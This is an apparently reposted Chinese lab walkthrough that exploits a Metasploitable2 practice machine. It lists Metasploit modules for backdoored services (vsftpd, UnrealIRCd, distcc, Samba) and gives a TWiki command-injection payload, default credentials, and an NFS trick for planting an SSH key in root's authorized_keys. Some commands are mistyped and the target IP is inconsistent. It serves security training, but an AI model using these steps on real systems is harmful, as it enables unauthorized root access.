加入收藏 | 设为首页 | 会员中心 | 我要投稿 晋中站长网 (https://www.0354zz.com/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 服务器 > 搭建环境 > Linux > 正文

linux 漏洞靶机,【漏洞验证】Metasploitable2靶机漏洞复现

发布时间:2023-01-08 12:01:35 所属栏目:Linux 来源:未知
导读: 文章目录
Metasploitable2靶机漏洞复现
1、TWiki 'rev' Parameter Arbitrary Command Execution
2、VNC Server 'password' Password
3、Ingreslock 后门漏洞
4、UnrealIRC

文章目录

Metasploitable2靶机漏洞复现

1、TWiki 'rev' Parameter Arbitrary Command Execution

2、VNC Server 'password' Password

3、Ingreslock 后门漏洞

4、UnrealIRCd Backdoor(ircd)

5、 PHP-CGI Query String Parameter Injection Arbitrary Code Execution

6、Tomcat管理台默认口令漏洞

7、MySQL弱密码登录

8、PostgreSQL弱密码登录

9、Distcc后门漏洞

10、vsftpd 2.3.4 后门漏洞

11、Druby 远程代码执行漏洞

12、Samba sysmlink 默认配置目录遍历漏洞

13、Samba MS-RPC Shell 命令注入漏洞

14、Linux NFS共享目录配置漏洞

Metasploitable2靶机漏洞复现

参考大佬:

环境:vmware虚拟机Metasploitable2环境

IP:192.168.72.130

1、TWiki ‘rev’ Parameter Arbitrary Command Execution

描述: rev参数可执行任意命令

验证: %20|pwd||echo

ceba684a4e61d386fe89e902afd943c9.png

2、VNC Server ‘password’ Password

验证: vncviewer 192.168.72.130

Password: password

6e41c5b8a7bcbd8a1795e5dd902c8771.png

3、Ingreslock 后门漏洞

原理: Ingreslock后门程序监听1524端口linux漏洞,连接到1524端口就可以直接获取root权限。

端口: 1524

验证: telnet 192.168.72.130 1524

4、UnrealIRCd Backdoor(ircd)

端口: 6667

利用模块: exploit/unix/irc/unreal_ircd_3281_backdoor

67285bcefedc5e5d93569658343b19a0.png

5、 PHP-CGI Query String Parameter Injection Arbitrary Code Execution

CVE-2012-1823

利用模块: exploit/multi/http/php_cgi_arg_injection

f04903555e032fcc145b6b814c841db5.png

6、Tomcat管理台默认口令漏洞

192.168.160.131:8180

tomcat/tomcat

7、MySQL弱密码登录

验证: mysql –h 192.168.160.131 –u root

059a16e970c3524fd719147f4bc0a0c6.png

8、PostgreSQL弱密码登录

postgres/postgres

52b0c81d1363cca7dc44458487174b07.png

9、Distcc后门漏洞

CVE-2004-2687

nmap扫描:

端口: 3632

利用模块: exploit/unix/misc/distcc_exec

6918c228c3d83d03e45ac9c70575e4ec.png

10、vsftpd 2.3.4 后门漏洞

nmap扫描:

利用模块: exploit/unix/ftp/vsftpd_234_backdoor

a05e550854f3d86ee529ea4397a39b67.png

11、Druby 远程代码执行漏洞

CVE-2013-0156(类似)

利用模块: exploit/linux/misc/drb_remote_codeexec

端口: 8787

3d7b0a954b53c3466bc96256dff34f73.png

12、Samba sysmlink 默认配置目录遍历漏洞

CVE-2010-0926

端口: 445

利用模块:

auxiliary/admin/smb/samba_symlink_traversal

set SMBSHARE tmp //设置SAM可写文件

在新窗口下打开上面生成的共享目录:

smbclient //IP/tmp (不输入密码直接回车)

cd rootfs

ls

5ec96746c59b1852f745d8cee1578b19.png

13、Samba MS-RPC Shell 命令注入漏洞

CVE-2007-2447

端口: 139

利用模块: exploit/multi/samba/usermap_script

274c91e93359a0c67861e861ec3a5e9b.png

14、Linux NFS共享目录配置漏洞

原理: NFS服务配置漏洞赋予了根目录远程可写权限,导致/root/.ssh/authorized_keys 可被修改,实现远程ssh无密码登录

47e19d12fbf9b7b1df2e8d0b49988274.png

输入ssh-keygen 生成RSA公钥

9535b5a66673df3b553bf14ba2d87e22.png

依次输入:

(1)mount –t nfs 192.168.160.131:/ /tmp/test(预先创建),把192.168.160.131的根目录挂载到/tmp/test/下;

(2)cat/root/.ssh/id_rsa.pub>>/tmp/test/root/.ssh/authorized_keys,把生成的公钥追加到靶机的authorized_keys下;

(3)sshroot@192.168.72.130,实现无密码登录

54ee6abb07055a9c61203f0cc7f79fc4.png

(编辑:晋中站长网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!